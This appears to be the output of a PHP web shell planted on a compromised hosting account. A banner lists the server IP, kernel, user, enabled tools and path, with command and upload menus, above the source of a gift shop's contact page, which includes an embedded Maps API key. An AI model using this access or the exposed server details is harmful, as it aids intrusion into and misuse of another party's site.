Server IP : 162.214.80.37 / Your IP : 216.73.216.83 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/imyrqtmy/public_html/giftsglobal/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!doctype html> <html class="no-js" lang="en"> <?php require "inc/head.php"; ?> <body> <!-- Main Wrapper Start --> <div id="main-wrapper" class="section"> <!-- Header Section Start --> <?php require "inc/header.php"; ?> <!-- Header Section End --> <!-- Page Banner Section Start--> <div class="page-banner-section section" style="background-image: url(img/bg/page-banner.jpg)"> <div class="container"> <div class="row"> <!-- Page Title Start --> <div class="page-title text-center col"> <!--<h1>contact us</h1>--> </div><!-- Page Title End --> </div> </div> </div><!-- Page Banner Section End--> <!-- Contact Section Start--> <div class="contact-section section bg-white pt-120"> <div class="container"> <div class="row justify-content-center"> <div class="col-xl-10 col-12"> <div class="contact-wrapper"> <div class="row"> <div class="contact-info col-lg-5 col-12"> <h4 class="title">Contact Info</h4> <p>At Gifts Global, we pride ourselves on providing excellent customer service. If you need help with placing an order, customizing a gift, or have any other inquiries, our friendly team is ready to assist you. Reach out to us using the contact methods, and we’ll get back to you as soon as possible.</p> <!-- <p>It is a long established fact that readewill be distracted by the readable content of a page when looking at ilayout.</p> --> <ul> <li><span>Address:</span>First floor, Shop No 101, JS Arcade Sector 18, Noida, Near Haldirams</li> <li><span>Email:</span> diamond.kodak@gmail.com</li> <li><span>Phone:</span> +91 9871619511 , +91 9718488183</li> </ul> <div class="contact-social"> <a href="#"><i class="fa fa-facebook"></i></a> <a href="#"><i class="fa fa-twitter"></i></a> <a href="#"><i class="fa fa-instagram"></i></a> <a href="#"><i class="fa fa-pinterest-p"></i></a> </div> </div> <div class="contact-form col-lg-7 col-12"> <h4 class="title">Send Your Massage</h4> <form action="mail.php" method="post"> <input type="text" name="name" placeholder="Your Name"> <input type="number" name="phone" placeholder="Your Mobile"> <input type="email" name="email" placeholder="Your Email"> <textarea name="message" placeholder="Your Message"></textarea> <input type="submit" value="Submit"> </form> <p class="form-messege"></p> </div> </div> </div> </div> </div> </div> </div><!-- Contact Section End--> <!-- Contact Map --> <div > <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3503.91947650852!2d77.31919727758353!3d28.572180624179758!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x390ce44ee3dc0d3b%3A0x46645c42c64ee6a2!2sJS%20Arcade%2C%20D-1%2C%20Captain%20Vijyant%20Thapar%20Marg%2C%20D%20Block%2C%20Pocket%20K%2C%20Sector%2018%2C%20Noida%2C%20Uttar%20Pradesh%20201301!5e0!3m2!1sen!2sin!4v1731500236725!5m2!1sen!2sin" width="100%" height="500" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe> </div> <!-- Footer Section Start--> <?php require "inc/footer.php"; ?> <!-- Footer Section End--> </div><!-- Main Wrapper End --> <!-- JS ============================================ --> <!-- jQuery JS --> <script src="js/vendor/jquery-1.12.0.min.js"></script> <script src="js/vendor/jquery-migrate-1.4.1.min.js"></script> <!-- Popper JS --> <script src="js/popper.min.js"></script> <!-- Bootstrap JS --> <script src="js/bootstrap.min.js"></script> <!-- Plugins JS --> <script src="js/plugins.js"></script> <!-- Ajax Mail JS --> <script src="js/ajax-mail.js"></script> <!-- Main JS --> <script src="js/main.js"></script> <!-- Google Map Api --> <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyAlZPf84AAVt8_FFN7rwQY5nPgB02SlTKs"></script> <script src="js/map.js"></script> </body> </html>